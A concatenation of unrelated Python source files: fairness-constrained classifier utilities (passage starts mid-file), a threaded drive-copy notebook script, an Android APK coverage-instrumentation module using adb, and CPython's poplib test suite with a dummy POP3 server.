all_class_labels_assigned_test, x_control_test, sensitive_attrs) cov_dict_test = print_covariance_sensitive_attrs(None, x_test, distances_boundary_test, x_control_test, sensitive_attrs) distances_boundary_train = (np.dot(x_train, w)).tolist() all_class_labels_assigned_train = np.sign(distances_boundary_train) correlation_dict_train = get_correlations(None, None, all_class_labels_assigned_train, x_control_train, sensitive_attrs) cov_dict_train = print_covariance_sensitive_attrs(None, x_train, distances_boundary_train, x_control_train, sensitive_attrs) output_folds.put([fold_num, test_score, train_score, correlation_dict_test, correlation_dict_train, cov_dict_test, cov_dict_train]) return output_folds = Queue() processes = [Process(target=train_test_single_fold, args=(train_folds[x], test_folds[x], x, output_folds, sensitive_attrs_to_cov_thresh_arr[x])) for x in range(num_folds)] # Run processes for p in processes: p.start() # Get the reuslts results = [output_folds.get() for p in processes] for p in processes: p.join() test_acc_arr = [] train_acc_arr = [] correlation_dict_test_arr = [] correlation_dict_train_arr = [] cov_dict_test_arr = [] cov_dict_train_arr = [] results = sorted(results, key = lambda x : x[0]) # sort w.r.t fold num for res in results: fold_num, test_score, train_score, correlation_dict_test, correlation_dict_train, cov_dict_test, cov_dict_train = res test_acc_arr.append(test_score) train_acc_arr.append(train_score) correlation_dict_test_arr.append(correlation_dict_test) correlation_dict_train_arr.append(correlation_dict_train) cov_dict_test_arr.append(cov_dict_test) cov_dict_train_arr.append(cov_dict_train) return test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr def print_classifier_fairness_stats(acc_arr, correlation_dict_arr, cov_dict_arr, s_attr_name): correlation_dict = get_avg_correlation_dict(correlation_dict_arr) non_prot_pos = correlation_dict[s_attr_name][1][1] prot_pos = correlation_dict[s_attr_name][0][1] p_rule = (prot_pos / non_prot_pos) * 100.0 print "Accuracy: %0.2f" % (np.mean(acc_arr)) print "Protected/non-protected in +ve class: %0.0f%% / %0.0f%%" % (prot_pos, non_prot_pos) print "P-rule achieved: %0.0f%%" % (p_rule) print "Covariance between sensitive feature and decision from distance boundary : %0.3f" % (np.mean([v[s_attr_name] for v in cov_dict_arr])) print return p_rule def compute_p_rule(x_control, class_labels): """ Compute the p-rule based on Doctrine of disparate impact """ non_prot_all = sum(x_control == 1.0) # non-protected group prot_all = sum(x_control == 0.0) # protected group non_prot_pos = sum(class_labels[x_control == 1.0] == 1.0) # non_protected in positive class prot_pos = sum(class_labels[x_control == 0.0] == 1.0) # protected in positive class frac_non_prot_pos = float(non_prot_pos) / float(non_prot_all) frac_prot_pos = float(prot_pos) / float(prot_all) p_rule = (frac_prot_pos / frac_non_prot_pos) * 100.0 print print "Total data points: %d" % (len(x_control)) print "# non-protected examples: %d" % (non_prot_all) print "# protected examples: %d" % (prot_all) print "Non-protected in positive class: %d (%0.0f%%)" % (non_prot_pos, non_prot_pos * 100.0 / non_prot_all) print "Protected in positive class: %d (%0.0f%%)" % (prot_pos, prot_pos * 100.0 / prot_all) print "P-rule is: %0.0f%%" % ( p_rule ) return p_rule def add_intercept(x): """ Add intercept to the data before linear classification """ m,n = x.shape intercept = np.ones(m).reshape(m, 1) # the constant b return np.concatenate((intercept, x), axis = 1) def check_binary(arr): "give an array of values, see if the values are only 0 and 1" s = sorted(set(arr)) if s[0] == 0 and s[1] == 1: return True else: return False def get_one_hot_encoding(in_arr): """ input: 1-D arr with int vals -- if not int vals, will raise an error output: m (ndarray): one-hot encoded matrix d (dict): also returns a dictionary original_val -> column in encoded matrix """ for k in in_arr: if str(type(k)) != "<type 'numpy.float64'>" and type(k) != int and type(k) != np.int64: print str(type(k)) print "************* ERROR: Input arr does not have integer types" return None in_arr = np.array(in_arr, dtype=int) assert(len(in_arr.shape)==1) # no column, means it was a 1-D arr attr_vals_uniq_sorted = sorted(list(set(in_arr))) num_uniq_vals = len(attr_vals_uniq_sorted) if (num_uniq_vals == 2) and (attr_vals_uniq_sorted[0] == 0 and attr_vals_uniq_sorted[1] == 1): return in_arr, None index_dict = {} # value to the column number for i in range(0,len(attr_vals_uniq_sorted)): val = attr_vals_uniq_sorted[i] index_dict[val] = i out_arr = [] for i in range(0,len(in_arr)): tup = np.zeros(num_uniq_vals) val = in_arr[i] ind = index_dict[val] tup[ind] = 1 # set that value of tuple to 1 out_arr.append(tup) return np.array(out_arr), index_dict def check_accuracy(model, x_train, y_train, x_test, y_test, y_train_predicted, y_test_predicted): """ returns the train/test accuracy of the model we either pass the model (w) else we pass y_predicted """ if model is not None and y_test_predicted is not None: print "Either the model (w) or the predicted labels should be None" raise Exception("Either the model (w) or the predicted labels should be None") if model is not None: y_test_predicted = np.sign(np.dot(x_test, model)) y_train_predicted = np.sign(np.dot(x_train, model)) def get_accuracy(y, Y_predicted): correct_answers = (Y_predicted == y).astype(int) # will have 1 when the prediction and the actual label match accuracy = float(sum(correct_answers)) / float(len(correct_answers)) return accuracy, sum(correct_answers) train_score, correct_answers_train = get_accuracy(y_train, y_train_predicted) test_score, correct_answers_test = get_accuracy(y_test, y_test_predicted) return train_score, test_score, correct_answers_train, correct_answers_test def test_sensitive_attr_constraint_cov(model, x_arr, y_arr_dist_boundary, x_control, thresh, verbose): """ The covariance is computed b/w the sensitive attr val and the distance from the boundary If the model is None, we assume that the y_arr_dist_boundary contains the distace from the decision boundary If the model is not None, we just compute a dot product or model and x_arr for the case of SVM, we pass the distace from bounday becase the intercept in internalized for the class and we have compute the distance using the project function this function will return -1 if the constraint specified by thresh parameter is not satifsified otherwise it will reutrn +1 if the return value is >=0, then the constraint is satisfied """ assert(x_arr.shape[0] == x_control.shape[0]) if len(x_control.shape) > 1: # make sure we just have one column in the array assert(x_control.shape[1] == 1) arr = [] if model is None: arr = y_arr_dist_boundary # simply the output labels else: arr = np.dot(model, x_arr.T) # the product with the weight vector -- the sign of this is the output label arr = np.array(arr, dtype=np.float64) cov = np.dot(x_control - np.mean(x_control), arr ) / float(len(x_control)) ans = thresh - abs(cov) # will be <0 if the covariance is greater than thresh -- that is, the condition is not satisfied # ans = thresh - cov # will be <0 if the covariance is greater than thresh -- that is, the condition is not satisfied if verbose is True: print "Covariance is", cov print "Diff is:", ans print return ans def print_covariance_sensitive_attrs(model, x_arr, y_arr_dist_boundary, x_control, sensitive_attrs): """ reutrns the covariance between sensitive features and distance from decision boundary """ arr = [] if model is None: arr = y_arr_dist_boundary # simplt the output labels else: arr = np.dot(model, x_arr.T) # the product with the weight vector -- the sign of this is the output label sensitive_attrs_to_cov_original = {} for attr in sensitive_attrs: attr_arr = x_control[attr] bin_attr = check_binary(attr_arr) # check if the attribute is binary (0/1), or has more than 2 vals if bin_attr == False: # if its a non-binary sensitive feature, then perform one-hot-encoding attr_arr_transformed, index_dict = get_one_hot_encoding(attr_arr) thresh = 0 if bin_attr: cov = thresh - test_sensitive_attr_constraint_cov(None, x_arr, arr, np.array(attr_arr), thresh, False) sensitive_attrs_to_cov_original[attr] = cov else: # sensitive feature has more than 2 categorical values cov_arr = [] sensitive_attrs_to_cov_original[attr] = {} for attr_val, ind in index_dict.items(): t = attr_arr_transformed[:,ind] cov = thresh - test_sensitive_attr_constraint_cov(None, x_arr, arr, t, thresh, False) sensitive_attrs_to_cov_original[attr][attr_val] = cov cov_arr.append(abs(cov)) cov = max(cov_arr) return sensitive_attrs_to_cov_original def get_correlations(model, x_test, y_predicted, x_control_test, sensitive_attrs): """ returns the fraction in positive class for sensitive feature values """ if model is not None: y_predicted = np.sign(np.dot(x_test, model)) y_predicted = np.array(y_predicted) out_dict = {} for attr in sensitive_attrs: attr_val = [] for v in x_control_test[attr]: attr_val.append(v) assert(len(attr_val) == len(y_predicted)) total_per_val = defaultdict(int) attr_to_class_labels_dict = defaultdict(lambda: defaultdict(int)) for i in range(0, len(y_predicted)): val = attr_val[i] label = y_predicted[i] # val = attr_val_int_mapping_dict_reversed[val] # change values from intgers to actual names total_per_val[val] += 1 attr_to_class_labels_dict[val][label] += 1 class_labels = set(y_predicted.tolist()) local_dict_1 = {} for k1,v1 in attr_to_class_labels_dict.items(): total_this_val = total_per_val[k1] local_dict_2 = {} for k2 in class_labels: # the order should be the same for printing v2 = v1[k2] f = float(v2) * 100.0 / float(total_this_val) local_dict_2[k2] = f local_dict_1[k1] = local_dict_2 out_dict[attr] = local_dict_1 return out_dict def get_constraint_list_cov(x_train, y_train, x_control_train, sensitive_attrs, sensitive_attrs_to_cov_thresh): """ get the list of constraints to be fed to the minimizer """ constraints = [] for attr in sensitive_attrs: attr_arr = x_control_train[attr] attr_arr_transformed, index_dict = get_one_hot_encoding(attr_arr) if index_dict is None: # binary attribute thresh = sensitive_attrs_to_cov_thresh[attr] c = ({'type': 'ineq', 'fun': test_sensitive_attr_constraint_cov, 'args':(x_train, y_train, attr_arr_transformed,thresh, False)}) constraints.append(c) else: # otherwise, its a categorical attribute, so we need to set the cov thresh for each value separately for attr_val, ind in index_dict.items(): attr_name = attr_val #print attr, attr_name, sensitive_attrs_to_cov_thresh[attr] thresh = sensitive_attrs_to_cov_thresh[attr][attr_name] t = attr_arr_transformed[:,ind] c = ({'type': 'ineq', 'fun': test_sensitive_attr_constraint_cov, 'args':(x_train, y_train, t ,thresh, False)}) constraints.append(c) return constraints def split_into_train_test(x_all, y_all, x_control_all, train_fold_size): split_point = int(round(float(x_all.shape[0]) * train_fold_size)) x_all_train = x_all[:split_point] x_all_test = x_all[split_point:] y_all_train = y_all[:split_point] y_all_test = y_all[split_point:] x_control_all_train = {} x_control_all_test = {} for k in x_control_all.keys(): x_control_all_train[k] = x_control_all[k][:split_point] x_control_all_test[k] = x_control_all[k][split_point:] return x_all_train, y_all_train, x_control_all_train, x_all_test, y_all_test, x_control_all_test def get_avg_correlation_dict(correlation_dict_arr): # make the structure for the correlation dict correlation_dict_avg = {} # print correlation_dict_arr for k,v in correlation_dict_arr[0].items(): correlation_dict_avg[k] = {} for feature_val, feature_dict in v.items(): correlation_dict_avg[k][feature_val] = {} for class_label, frac_class in feature_dict.items(): correlation_dict_avg[k][feature_val][class_label] = [] # populate the correlation dict for correlation_dict in correlation_dict_arr: for k,v in correlation_dict.items(): for feature_val, feature_dict in v.items(): for class_label, frac_class in feature_dict.items(): correlation_dict_avg[k][feature_val][class_label].append(frac_class) # now take the averages for k,v in correlation_dict_avg.items(): for feature_val, feature_dict in v.items(): for class_label, frac_class_arr in feature_dict.items(): correlation_dict_avg[k][feature_val][class_label] = np.mean(frac_class_arr) return correlation_dict_avg def plot_cov_thresh_vs_acc_pos_ratio(x_all, y_all, x_control_all, num_folds, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs): # very the covariance threshold using a range of decreasing multiplicative factors and see the tradeoffs between accuracy and fairness it = 0.05 cov_range = np.arange(1.0, 0.0-it, -it).tolist() if apply_accuracy_constraint == True: if sep_constraint == False: it = 0.1 cov_range = np.arange(0.0, 1.0 + it, it).tolist() if sep_constraint == True: cov_range = [0,1,5,10,20,50,100,500,1000] positive_class_label = 1 # positive class is +1 train_acc = [] test_acc = [] positive_per_category = defaultdict(list) # for each category (male / female), the frac of positive # first get the original values of covariance in the unconstrained classifier -- these original values are not needed for reverse constraint test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = compute_cross_validation_error(x_all, y_all, x_control_all, num_folds, loss_function, 0, apply_accuracy_constraint, sep_constraint, sensitive_attrs, [{} for i in range(0,num_folds)], 0) for c in cov_range: print "LOG: testing for multiplicative factor: %0.2f" % c sensitive_attrs_to_cov_original_arr_multiplied = [] for sensitive_attrs_to_cov_original in cov_dict_train_arr: sensitive_attrs_to_cov_thresh = deepcopy(sensitive_attrs_to_cov_original) for k in sensitive_attrs_to_cov_thresh.keys(): v = sensitive_attrs_to_cov_thresh[k] if type(v) == type({}): for k1 in v.keys(): v[k1] = v[k1] * c else: sensitive_attrs_to_cov_thresh[k] = v * c sensitive_attrs_to_cov_original_arr_multiplied.append(sensitive_attrs_to_cov_thresh) test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = compute_cross_validation_error(x_all, y_all, x_control_all, num_folds, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_original_arr_multiplied, c) test_acc.append(np.mean(test_acc_arr)) correlation_dict_train = get_avg_correlation_dict(correlation_dict_train_arr) correlation_dict_test = get_avg_correlation_dict(correlation_dict_test_arr) # just plot the correlations for the first sensitive attr, the plotting can be extended for the other values, but as a proof of concept, we will jsut show for one s = sensitive_attrs[0] for k,v in correlation_dict_test[s].items(): if v.get(positive_class_label) is None: positive_per_category[k].append(0.0) else: positive_per_category[k].append(v[positive_class_label]) positive_per_category = dict(positive_per_category) p_rule_arr = (np.array(positive_per_category[0]) / np.array(positive_per_category[1])) * 100.0 ax = plt.subplot(2,1,1) plt.plot(cov_range, positive_per_category[0], "-o" , color="green", label = "Protected") plt.plot(cov_range, positive_per_category[1], "-o", color="blue", label = "Non-protected") ax.set_xlim([min(cov_range), max(cov_range)]) plt.xlabel('Multiplicative loss factor') plt.ylabel('Perc. in positive class') if apply_accuracy_constraint == False: plt.gca().invert_xaxis() plt.xlabel('Multiplicative covariance factor (c)') ax.legend() ax = plt.subplot(2,1,2) plt.scatter(p_rule_arr, test_acc, color="red") ax.set_xlim([min(p_rule_arr), max(max(p_rule_arr), 100)]) plt.xlabel('P% rule') plt.ylabel('Accuracy') plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=None, hspace=0.5) plt.show() def get_line_coordinates(w, x1, x2): y1 = (-w[0] - (w[1] * x1)) / w[2] y2 = (-w[0] - (w[1] * x2)) / w[2] return y1,y2
File Transfer.py
#!/usr/bin/env python # coding: utf-8 # In[ ]: import threading import time import shutil # In[ ]: def copyfunc(src,dst): shutil.copytree(src,dst) # In[ ]: start = time.time() src="E:\\" dst="F:\\" threads = [] for file in os.listdir(src): t = threading.Thread(target=copyfunc,args=(src+file,dst+"abcd\\"+file)) t.start() threads.append(t) for thread in threads: thread.join() end=time.time() print(end-start) # In[ ]: start = time.time() copyfunc("E:\\","F:\\abcde") end=time.time() print(end-start) # In[ ]: import os # In[ ]: os.listdir('F:\\') # In[ ]: import subprocess # In[ ]: subprocess.run([])
smiler.py
import os import sys import subprocess import re import shutil import threading import signal import logging import time sys.path.extend(['./acvtool/smiler/libs']) from config import config from granularity import Granularity from instrumenting import manifest_instrumenter from libs import Libs from smalitree import SmaliTree from apktool_interface import ApktoolInterface from smali_instrumenter import Instrumenter from utils import timeit from utils import Utils apk_info_pattern = re.compile("package: name='(?P<package>.*?)'") CRASH_REPORT_FILENAME = "errors.txt" def install(new_apk_path): logging.info("installing") cmd = '{} install -r "{}"'.format(config.adb_path, new_apk_path) out = request_pipe(cmd) logging.info(out) def uninstall(package): logging.info("uninstalling") cmd = '{} uninstall "{}"'.format(config.adb_path, package) out = request_pipe(cmd) logging.info(out) def request_pipe(cmd): pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) out, err = pipe.communicate() res = out if not out: res = err if pipe.returncode > 0: raise Exception("----------------------------------------------------\n\ Out: %s\nError: %s" % (out, err)) return res def get_apk_properties(path): info_cmd = "%s dump badging %s" % (config.aapt_path, path) out = request_pipe(info_cmd) matched = re.match(apk_info_pattern, out) package_name = matched.group('package') return apkinfo(package_name, "", "") def get_package_files_list(package_name): cmd = '%s shell ls "/mnt/sdcard/%s/"' % (config.adb_path, package_name) out = request_pipe(cmd) files = [f for f in out.split() if not f.endswith('/')] return files def get_execution_results(package_name, output_dir): result_files = get_package_files_list(package_name) coverage_files = [f for f in result_files if f.endswith(".ec")] crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in result_files else None if not (coverage_files or crash_file): raise Exception("No coverage or crash report files have been detected on the device for {} package.\n\ Run acvtool with \'-start\' argument to produce coverage.".format(package_name)) if os.path.exists(output_dir): shutil.rmtree(output_dir) os.makedirs(output_dir) for f in result_files: adb_pull(package_name, f, output_dir) adb_delete_files(package_name, f) if crash_file: adb_pull(package_name, crash_file, output_dir) adb_delete_files(package_name, crash_file) def adb_pull(package_name, file_path, pull_to): cmd = "%s pull mnt/sdcard/%s/%s %s" % (config.adb_path, package_name, file_path, os.path.abspath(pull_to)) out = request_pipe(cmd) logging.info(out) def adb_delete_files(package_name, file_name): cmd = "%s shell rm mnt/sdcard/%s/%s" % (config.adb_path, package_name, file_name) out = request_pipe(cmd) def grant_storage_permission(package): read_storage_cmd = "{0} shell pm grant {1} android.permission.READ_EXTERNAL_STORAGE".format(config.adb_path, package) subprocess.call(read_storage_cmd, shell=True) write_storage_cmd = "{0} shell pm grant {1} android.permission.WRITE_EXTERNAL_STORAGE".format(config.adb_path, package) subprocess.call(write_storage_cmd, shell=True) def start_instrumenting(package, release_thread=False, onstop=None, timeout=None): grant_storage_permission(package) lock_thread = "" if release_thread else "-w" cmd = '{} shell am instrument -e coverage true {} {}/{}'.format(config.adb_path, lock_thread, package, config.INSTRUMENTING_NAME) if release_thread: os.system(cmd) return out = '' def run(): out = request_pipe(cmd) logging.info(out) original_sigint = signal.getsignal(signal.SIGINT) def stop(signum, frame): signal.signal(signal.SIGINT, original_sigint) stop_instrumenting(package, timeout) if onstop: onstop() t = threading.Thread(target=run) t.start() print("Press Ctrl+C to finish ...") signal.signal(signal.SIGINT, stop) def coverage_is_locked(package_name): cmd = "{} shell \"test -e /mnt/sdcard/{}.lock > /dev/null 2>&1 && echo \'1\' || echo \'0\'\"".format(config.adb_path, package_name) logging.debug('Command to check lock file:' + cmd) locked = subprocess.check_output(cmd, shell=True).replace("\n","").replace("\r", "") return locked == '1' def stop_instrumenting(package_name, timeout=None): cmd = "{} shell am broadcast -a 'tool.acv.finishtesting'".format(config.adb_path) logging.info("finish testing") result = subprocess.call(cmd, shell=True) logging.info(result) locked = coverage_is_locked(package_name) if timeout is None: timeout = config.default_onstop_timeout while locked and timeout: logging.info("wait until the coverage file is saved {}".format(package_name)) time.sleep(1) locked = coverage_is_locked(package_name) timeout -= 1 files = get_package_files_list(package_name) coverage_files = [f for f in files if f.endswith(".ec")] crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in files else None logging.info("coverage files at /mnt/sdcard/{0}:".format(package_name)) logging.info("\n".join(coverage_files)) if crash_file: logging.info("crash report /mnt/sdcard/{0}/{1}".format(package_name, crash_file)) @timeit def instrument_apk(apk_path, result_dir, dbg_start=None, dbg_end=None, installation=False, granularity=Granularity.default, mem_stats=None): ''' I assume that the result_dir is empty is checked. ''' apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH, javaOpts = config.APKTOOL_JAVA_OPTS, pathApktool = Libs.APKTOOL_PATH, jarApktool = Libs.APKTOOL_PATH) package = get_apk_properties(apk_path).package unpacked_data_path = decompile_apk(apktool, apk_path, package, result_dir) manifest_path = get_path_to_manifest(unpacked_data_path) logging.info("decompiled {0}".format(package)) instrument_manifest(manifest_path) smali_code_path = get_path_to_smali_code(unpacked_data_path) pickle_path = get_pickle_path(apk_path, result_dir) instrument_smali_code(smali_code_path, pickle_path, package, granularity, dbg_start, dbg_end, mem_stats) logging.info("instrumented") instrumented_package_path = get_path_to_instrumented_package(apk_path, result_dir) remove_if_exits(instrumented_package_path) build_apk(apktool, unpacked_data_path, instrumented_package_path) Utils.rm_tree(unpacked_data_path) logging.info("built") instrumented_apk_path = get_path_to_insrumented_apk(instrumented_package_path, result_dir) sign_align_apk(instrumented_package_path, instrumented_apk_path) logging.info("apk instrumented: {0}".format(instrumented_apk_path)) logging.info("package name: {0}".format(package)) if installation: install(instrumented_apk_path) return (package, instrumented_apk_path, pickle_path) def remove_if_exits(path): if os.path.exists(path): os.remove(path) def build_dir(apktool_dir, result_dir, signature=False, installation=False): apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH, javaOpts = config.APKTOOL_JAVA_OPTS, pathApktool = Libs.APKTOOL_PATH, jarApktool = Libs.APKTOOL_PATH) build_pkg_path = os.path.join(result_dir, "build_temp.apk") build_apk(apktool, apktool_dir, build_pkg_path) package = get_apk_properties(build_pkg_path).package result_apk_path = build_pkg_path if signature: result_apk_path = os.path.join(result_dir, "build_{0}.apk".format(package)) sign_align_apk(build_pkg_path, result_apk_path) print('apk was built and signed: {0}'.format(result_apk_path)) else: print('apk was built: {0}'.format(result_apk_path)) if installation: install(result_apk_path) return result_apk_path def decompile_apk(apktool, apk_path, package, result_dir): unpacked_data_path = os.path.join(result_dir, "apktool", package) (run_successful, cmd_output) = apktool.decode(apkPath = apk_path, dirToDecompile = unpacked_data_path, quiet = True, noSrc = False, noRes = False, debug = False, noDebugInfo = False, force = True, #directory exist so without this this process finishes frameworkTag = "", frameworkDir = "", keepBrokenRes = False) if not run_successful: print("Run is not successful!") return unpacked_data_path def get_path_to_manifest(unpacked_data_path): pth = os.path.join(unpacked_data_path, "AndroidManifest.xml") return pth def get_path_to_smali_code(unpacked_data_path): pth = os.path.join(unpacked_data_path, "smali") return pth def get_path_to_instrumentation_metadata_dir(result_dir): pth = os.path.join(result_dir, "metadata") return pth def get_path_to_insrumented_apk(apk_path, result_dir): apk_dir, apk_fname = os.path.split(apk_path) new_apk_fname = "{}_{}".format("instr", apk_fname) pth = os.path.join(result_dir, new_apk_fname) return pth def get_path_to_instrumented_package(apk_path, result_dir): apk_dir, apk_fname = os.path.split(apk_path) path = os.path.join(result_dir, apk_fname) return path def get_pickle_path(apk_path, result_dir): apk_dir, apk_fname = os.path.split(apk_path) metadata_dir = get_path_to_instrumentation_metadata_dir(result_dir) return os.path.join(metadata_dir, "{}.pickle".format(apk_fname[:-4])) def instrument_manifest(manifest_path): manifest_instrumenter.instrumentAndroidManifestFile(manifest_path, addSdCardPermission=True) @timeit def instrument_smali_code(input_smali_dir, pickle_path, package, granularity, dbg_start=None, dbg_end=None, mem_stats=None): smali_tree = SmaliTree(input_smali_dir) smali_instrumenter = Instrumenter(smali_tree, granularity, package, dbg_start, dbg_end, mem_stats) smali_instrumenter.save_instrumented_smali(input_smali_dir) smali_instrumenter.save_pickle(pickle_path) def sign_align_apk(instrumented_package_path, output_apk): aligned_apk_path = instrumented_package_path.replace('.apk', '_signed_tmp.apk') align_cmd = '"{}" -f 4 "{}" "{}"'.format(config.zipalign, instrumented_package_path, aligned_apk_path) request_pipe(align_cmd) apksigner_cmd = '{} sign --ks {} --ks-pass pass:{} --out {} {}'\ .format(config.apksigner_path, config.keystore_path, config.keystore_password, output_apk, aligned_apk_path) request_pipe(apksigner_cmd) os.remove(aligned_apk_path) def build_apk(apktool, apkdata_dir, new_apk_path): apktool.build(srcPath=apkdata_dir, finalApk=new_apk_path, forceAll=True, debug=False) class apkinfo(object): """Properties of the apk file.""" def __init__(self, package=None, sdkversion=None, targetsdkverion=None): self.package = package self.sdkversion = sdkversion self.targetsdkversion = targetsdkverion def __repr__(self): return "%s %s %s" % (self.package, self.sdkversion, self.targetsdkversion)
test_poplib.py
"""Test script for poplib module.""" # Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL # a real test suite import poplib import asyncore import asynchat import socket import os import errno import threading from unittest import TestCase, skipUnless from test import support as test_support HOST = test_support.HOST PORT = 0 SUPPORTS_SSL = False if hasattr(poplib, 'POP3_SSL'): import ssl SUPPORTS_SSL = True CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert3.pem") CAFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "pycacert.pem") requires_ssl = skipUnless(SUPPORTS_SSL, 'SSL not supported') # the dummy data returned by server when LIST and RETR commands are issued LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n' RETR_RESP = b"""From: [email protected]\ \r\nContent-Type: text/plain\r\n\ MIME-Version: 1.0\r\n\ Subject: Dummy\r\n\ \r\n\ line1\r\n\ line2\r\n\ line3\r\n\ .\r\n""" class DummyPOP3Handler(asynchat.async_chat): CAPAS = {'UIDL': [], 'IMPLEMENTATION': ['python-testlib-pop-server']} enable_UTF8 = False def __init__(self, conn): asynchat.async_chat.__init__(self, conn) self.set_terminator(b"\r\n") self.in_buffer = [] self.push('+OK dummy pop3 server ready. <timestamp>') self.tls_active = False self.tls_starting = False def collect_incoming_data(self, data): self.in_buffer.append(data) def found_terminator(self): line = b''.join(self.in_buffer) line = str(line, 'ISO-8859-1') self.in_buffer = [] cmd = line.split(' ')[0].lower() space = line.find(' ') if space != -1: arg = line[space + 1:] else: arg = "" if hasattr(self, 'cmd_' + cmd): method = getattr(self, 'cmd_' + cmd) method(arg) else: self.push('-ERR unrecognized POP3 command "%s".' %cmd) def handle_error(self): raise def push(self, data): asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n') def cmd_echo(self, arg): # sends back the received string (used by the test suite) self.push(arg) def cmd_user(self, arg): if arg != "guido": self.push("-ERR no such user") self.push('+OK password required') def cmd_pass(self, arg): if arg != "python": self.push("-ERR wrong password") self.push('+OK 10 messages') def cmd_stat(self, arg): self.push('+OK 10 100') def cmd_list(self, arg): if arg: self.push('+OK %s %s' % (arg, arg)) else: self.push('+OK') asynchat.async_chat.push(self, LIST_RESP) cmd_uidl = cmd_list def cmd_retr(self, arg): self.push('+OK %s bytes' %len(RETR_RESP)) asynchat.async_chat.push(self, RETR_RESP) cmd_top = cmd_retr def cmd_dele(self, arg): self.push('+OK message marked for deletion.') def cmd_noop(self, arg): self.push('+OK done nothing.') def cmd_rpop(self, arg): self.push('+OK done nothing.') def cmd_apop(self, arg): self.push('+OK done nothing.') def cmd_quit(self, arg): self.push('+OK closing.') self.close_when_done() def _get_capas(self): _capas = dict(self.CAPAS) if not self.tls_active and SUPPORTS_SSL: _capas['STLS'] = [] return _capas def cmd_capa(self, arg): self.push('+OK Capability list follows') if self._get_capas(): for cap, params in self._get_capas().items(): _ln = [cap] if params: _ln.extend(params) self.push(' '.join(_ln)) self.push('.') def cmd_utf8(self, arg): self.push('+OK I know RFC6856' if self.enable_UTF8 else '-ERR What is UTF8?!') if SUPPORTS_SSL: def cmd_stls(self, arg): if self.tls_active is False: self.push('+OK Begin TLS negotiation') context = ssl.SSLContext() context.load_cert_chain(CERTFILE) tls_sock = context.wrap_socket(self.socket, server_side=True, do_handshake_on_connect=False, suppress_ragged_eofs=False) self.del_channel() self.set_socket(tls_sock) self.tls_active = True self.tls_starting = True self.in_buffer = [] self._do_tls_handshake() else: self.push('-ERR Command not permitted when TLS active') def _do_tls_handshake(self): try: self.socket.do_handshake() except ssl.SSLError as err: if err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE): return elif err.args[0] == ssl.SSL_ERROR_EOF: return self.handle_close() # TODO: SSLError does not expose alert information elif "SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1]: return self.handle_close() raise except OSError as err: if err.args[0] == errno.ECONNABORTED: return self.handle_close() else: self.tls_active = True self.tls_starting = False def handle_read(self): if self.tls_starting: self._do_tls_handshake() else: try: asynchat.async_chat.handle_read(self) except ssl.SSLEOFError: self.handle_close() class DummyPOP3Server(asyncore.dispatcher, threading.Thread): handler = DummyPOP3Handler def __init__(self, address, af=socket.AF_INET): threading.Thread.__init__(self) asyncore.dispatcher.__init__(self) self.create_socket(af, socket.SOCK_STREAM) self.bind(address) self.listen(5) self.active = False self.active_lock = threading.Lock() self.host, self.port = self.socket.getsockname()[:2] self.handler_instance = None def start(self): assert not self.active self.__flag = threading.Event() threading.Thread.start(self) self.__flag.wait() def run(self): self.active = True self.__flag.set() while self.active and asyncore.socket_map: self.active_lock.acquire() asyncore.loop(timeout=0.1, count=1) self.active_lock.release() asyncore.close_all(ignore_all=True) def stop(self): assert self.active self.active = False self.join() def handle_accepted(self, conn, addr): self.handler_instance = self.handler(conn) def handle_connect(self): self.close() handle_read = handle_connect def writable(self): return 0 def handle_error(self): raise class TestPOP3Class(TestCase): def assertOK(self, resp): self.assertTrue(resp.startswith(b"+OK")) def setUp(self): self.server = DummyPOP3Server((HOST, PORT)) self.server.start() self.client = poplib.POP3(self.server.host, self.server.port, timeout=3) def tearDown(self): self.client.close() self.server.stop() # Explicitly clear the attribute to prevent dangling thread self.server = None def test_getwelcome(self): self.assertEqual(self.client.getwelcome(), b'+OK dummy pop3 server ready. <timestamp>') def test_exceptions(self): self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err') def test_user(self): self.assertOK(self.client.user('guido')) self.assertRaises(poplib.error_proto, self.client.user, 'invalid') def test_pass_(self): self.assertOK(self.client.pass_('python')) self.assertRaises(poplib.error_proto, self.client.user, 'invalid') def test_stat(self): self.assertEqual(self.client.stat(), (10, 100)) def test_list(self): self.assertEqual(self.client.list()[1:], ([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'], 25)) self.assertTrue(self.client.list('1').endswith(b"OK 1 1")) def test_retr(self): expected = (b'+OK 116 bytes', [b'From: [email protected]', b'Content-Type: text/plain', b'MIME-Version: 1.0', b'Subject: Dummy', b'', b'line1', b'line2', b'line3'], 113) foo = self.client.retr('foo') self.assertEqual(foo, expected) def test_too_long_lines(self): self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo +%s' % ((poplib._MAXLINE + 10) * 'a')) def test_dele(self): self.assertOK(self.client.dele('foo')) def test_noop(self): self.assertOK(self.client.noop()) def test_rpop(self): self.assertOK(self.client.rpop('foo')) def test_apop(self): self.assertOK(self.client.apop('foo', 'dummypassword')) def test_top(self): expected = (b'+OK 116 bytes', [b'From: [email protected]', b'Content-Type: text/plain', b'MIME-Version: 1.0', b'Subject: Dummy', b'', b'line1', b'line2', b'line3'], 113) 